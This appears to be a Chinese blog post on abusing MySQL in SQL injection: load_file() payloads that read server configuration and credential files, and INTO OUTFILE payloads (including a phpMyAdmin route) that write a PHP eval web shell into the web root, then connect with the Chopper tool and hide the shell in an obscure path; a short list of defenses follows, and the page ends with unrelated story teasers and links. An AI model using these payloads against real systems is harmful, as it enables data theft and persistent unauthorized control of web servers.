into outfile的使用

0x00 load_file()

  • 條件:
1. 要有file_priv權(quán)限
2. 知道文件絕對路徑
3. 能使用union
4. 對web目錄有讀權(quán)限  
注:若過濾了單引號,則可以將函數(shù)中的字符進(jìn)行hex編碼
  • 一般步驟

    • 讀/etc/init.d下的東西,這里有配置文件路徑
    ?id=1' union select 1,2,load_file('/etc/init.d/httpd')
    
    • 得到web安裝路徑
    ?id=1' union select 1,2,load_file('/etc/apache/conf/httpd.conf')
    
    • 讀取密碼文件
    ?id=1' union select 1,2,load_file('/site/xxx.com/conf/conn.inc.php')
    

0x01 into outfile

  • 條件:
1. 要有file_priv權(quán)限  
2. 知道網(wǎng)站絕對路徑  
3. 要能用union  
4. 對web目錄有寫權(quán)限  
5. 沒有過濾單引號
  • 一般方法
    當(dāng)知道路徑時,可以直接用?id=1 union select "<?php @eval($_POST['c']);?>" into outfile("C:/phpStudy/WWW/a.php")

  • 其他方法

    • 登陸phpMyAdmin
    use test;  選擇數(shù)據(jù)庫為test
    create table aaa(bbb varchar(64));   在數(shù)據(jù)庫中創(chuàng)建一個表aaa
    insert into aaa values("<?php @eval($_POST['c']);?>"); --在aaa中插入一條數(shù)據(jù)<?php @eval($_POST['c']);?>
    select * from aaa into outfile 'C:/phpStudy/WWW/a.php'; --將aaa中的數(shù)據(jù)導(dǎo)出到文件a.php
    
    • localhost:80/a.php能訪問
    drop aaa; --刪除建立的表
    
    • 然后菜刀連接
    菜刀連接http://www.aa.com/a.php廉侧,然后更改shell的名字并將shell放在較隱蔽的地方,比如C:\phpStudy\WWW\phpMyAdmin\setup\lib\common.php
    

0x02 防御

  • 數(shù)據(jù)庫連接賬號不要用root權(quán)限
  • php關(guān)閉報錯模式
  • mysql賬戶沒有權(quán)限向網(wǎng)站目錄寫文件
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市姓惑,隨后出現(xiàn)的幾起案子褐奴,更是在濱河造成了極大的恐慌,老刑警劉巖挺益,帶你破解...
    沈念sama閱讀 211,743評論 6 492
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件歉糜,死亡現(xiàn)場離奇詭異,居然都是意外死亡望众,警方通過查閱死者的電腦和手機(jī)匪补,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,296評論 3 385
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來烂翰,“玉大人夯缺,你說我怎么就攤上這事「使ⅲ” “怎么了踊兜?”我有些...
    開封第一講書人閱讀 157,285評論 0 348
  • 文/不壞的土叔 我叫張陵,是天一觀的道長佳恬。 經(jīng)常有香客問我捏境,道長,這世上最難降的妖魔是什么毁葱? 我笑而不...
    開封第一講書人閱讀 56,485評論 1 283
  • 正文 為了忘掉前任垫言,我火速辦了婚禮,結(jié)果婚禮上倾剿,老公的妹妹穿的比我還像新娘筷频。我一直安慰自己,他們只是感情好前痘,可當(dāng)我...
    茶點故事閱讀 65,581評論 6 386
  • 文/花漫 我一把揭開白布凛捏。 她就那樣靜靜地躺著,像睡著了一般芹缔。 火紅的嫁衣襯著肌膚如雪坯癣。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 49,821評論 1 290
  • 那天乖菱,我揣著相機(jī)與錄音坡锡,去河邊找鬼。 笑死窒所,一個胖子當(dāng)著我的面吹牛鹉勒,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播吵取,決...
    沈念sama閱讀 38,960評論 3 408
  • 文/蒼蘭香墨 我猛地睜開眼禽额,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起脯倒,我...
    開封第一講書人閱讀 37,719評論 0 266
  • 序言:老撾萬榮一對情侶失蹤实辑,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后藻丢,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體剪撬,經(jīng)...
    沈念sama閱讀 44,186評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,516評論 2 327
  • 正文 我和宋清朗相戀三年悠反,在試婚紗的時候發(fā)現(xiàn)自己被綠了残黑。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 38,650評論 1 340
  • 序言:一個原本活蹦亂跳的男人離奇死亡斋否,死狀恐怖梨水,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情茵臭,我是刑警寧澤疫诽,帶...
    沈念sama閱讀 34,329評論 4 330
  • 正文 年R本政府宣布,位于F島的核電站旦委,受9級特大地震影響奇徒,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜缨硝,卻給世界環(huán)境...
    茶點故事閱讀 39,936評論 3 313
  • 文/蒙蒙 一逼龟、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧追葡,春花似錦、人聲如沸奕短。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,757評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽翎碑。三九已至谬返,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間日杈,已是汗流浹背遣铝。 一陣腳步聲響...
    開封第一講書人閱讀 31,991評論 1 266
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點兒被人妖公主榨干…… 1. 我叫王不留莉擒,地道東北人酿炸。 一個月前我還...
    沈念sama閱讀 46,370評論 2 360
  • 正文 我出身青樓,卻偏偏與公主長得像涨冀,于是被迫代替她去往敵國和親填硕。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 43,527評論 2 349

推薦閱讀更多精彩內(nèi)容

  • 一套實用的滲透測試崗位面試題,你會嗎扁眯? 1.拿到一個待檢測的站壮莹,你覺得應(yīng)該先做什么? 收集信息 whois姻檀、網(wǎng)站源...
    g0閱讀 4,818評論 0 9
  • sqlmap用戶手冊 說明:本文為轉(zhuǎn)載命满,對原文中一些明顯的拼寫錯誤進(jìn)行修正,并標(biāo)注對自己有用的信息绣版。 ======...
    wind_飄閱讀 2,035評論 0 5
  • Web安全之SQL注入漏洞 本節(jié)知識點 SQL注入原理 前言 結(jié)構(gòu)化查詢語句(Structured Query L...
    f354f7231c35閱讀 2,033評論 0 5
  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 當(dāng)給sq...
    xuningbo閱讀 10,279評論 2 22
  • Spring Cloud為開發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見模式的工具(例如配置管理胶台,服務(wù)發(fā)現(xiàn),斷路器僵娃,智...
    卡卡羅2017閱讀 134,633評論 18 139